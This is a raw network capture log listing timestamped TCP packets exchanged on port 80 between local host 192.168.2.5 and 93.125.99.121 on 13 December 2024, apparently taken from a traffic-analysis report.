Dec 13, 2024 17:57:35.499248028 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.499294996 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.500483036 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.500545025 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.500591040 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.500632048 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.501600981 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.501657963 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.501671076 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.501714945 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.502949953 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.502986908 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.503015041 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.503037930 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.504231930 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.504323006 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.504386902 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.504432917 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.505436897 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.505496979 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.505553007 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.505600929 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.506699085 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.506755114 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.506824017 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.506867886 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.508027077 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.508083105 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.508130074 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.508169889 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.509233952 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.509294033 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.509341955 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.509382010 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.510493040 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.510549068 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.510575056 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.510628939 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.511833906 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.511873960 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.511893988 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.511918068 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.513051987 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.513084888 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.513104916 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.513128042 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.514307976 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.514358997 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.514417887 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.514460087 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.515647888 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.515691996 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.515707016 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.515731096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.516889095 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.516949892 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.517009974 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.517050028 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.518121958 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.518174887 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.518239021 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.518277884 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.519419909 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.519464016 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.519483089 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.519503117 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.520756960 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.520827055 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.520842075 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.520884991 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.521964073 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.522003889 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.522023916 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.522047043 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.523262978 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.523320913 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.523403883 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.523452044 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.524516106 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.524570942 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.524600029 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.524636984 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.525911093 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.525955915 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.525971889 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.525996923 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.527102947 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.527163982 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.527235985 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.527276993 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.528536081 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.528578997 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.528605938 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.528629065 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.529700994 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.529746056 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.529766083 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.529819012 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.530955076 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.530996084 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.531008959 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.531038046 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.532094955 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.532156944 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.532221079 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.532258987 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.533389091 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.533444881 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.533484936 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.533524990 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.534656048 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.534713030 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.534787893 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.534830093 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.535931110 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.535984039 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.536055088 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.536089897 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.537209034 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.537266016 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.537317038 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.537355900 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.538472891 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.538551092 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.538589001 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.538629055 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.539800882 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.539846897 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.539877892 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.539889097 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.541037083 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.541106939 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.541126966 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.541165113 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.542283058 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.542347908 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.673732996 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.673845053 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.673851967 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.673896074 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.674084902 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.674129009 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.674185991 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.674226999 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.675463915 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.675514936 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.675520897 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.675554037 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.675626993 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.675669909 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.676625967 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.676664114 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.676682949 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.676702023 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.677875042 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
                                              Dec 13, 2024 17:57:35.677932024 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.677987099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.678029060 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.678973913 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.679028034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.679065943 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.679106951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.680185080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.680244923 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.680260897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.680298090 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.681349039 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.681396961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.681550980 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.681590080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.682698965 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.682748079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.682785988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.682825089 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.683798075 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.683857918 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.683904886 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.683944941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.685034990 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.685133934 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.685167074 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.685205936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.686224937 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.686285973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.686290026 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.686326027 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.687427044 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.687459946 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.687488079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.687505960 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.688616991 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.688695908 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.688745975 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.688785076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.689824104 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.689879894 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.689939022 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.689984083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.691060066 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.691097021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.691117048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.691128016 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.692210913 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.692265034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.692303896 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.692346096 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.693397999 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.693449974 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.693500996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.693541050 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.694632053 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.694685936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.694720030 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.694760084 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.695805073 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.695853949 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.695861101 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.695888996 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.697031021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.697082043 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.697149992 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.697191954 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.698273897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.698317051 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.698400974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.698442936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.699409962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.699467897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.699515104 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.699554920 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.700644970 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.700705051 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.700803041 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.700845957 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.701895952 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.701946020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.701951981 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.701991081 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.703231096 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.703274012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.703290939 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.703319073 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.704262018 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.704313040 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.704348087 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.704385042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.705504894 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.705562115 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.705641031 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.705681086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.706646919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.706700087 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.706737041 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.706777096 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.707885027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.707921982 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.707937956 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.707956076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.709084034 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.709136963 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.709162951 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.709201097 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.710289955 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.710342884 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.710402012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.710442066 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.711481094 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.711539984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.711541891 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.711579084 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.712688923 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.712728024 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.712744951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.712764978 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.713876009 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.713929892 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.713960886 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.713998079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.715166092 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.715224981 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.715229034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.715261936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.716377974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.716397047 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.716428041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.716447115 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.717530012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.717592001 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.717597961 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.717636108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.718744040 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.718806982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.718821049 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.718859911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.719979048 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.720033884 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.720211029 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.720257998 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.721133947 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.721184015 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.721227884 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.721266031 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.722342968 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.722400904 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.722424984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.722465992 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.723475933 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.723529100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.723599911 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.723644018 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.724750996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.724808931 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.724864960 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.724910021 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.725974083 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.726013899 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.726027966 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.726052046 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.727222919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.727278948 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.727341890 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.727386951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.728413105 CET804970493.125.99.121192.168.2.5
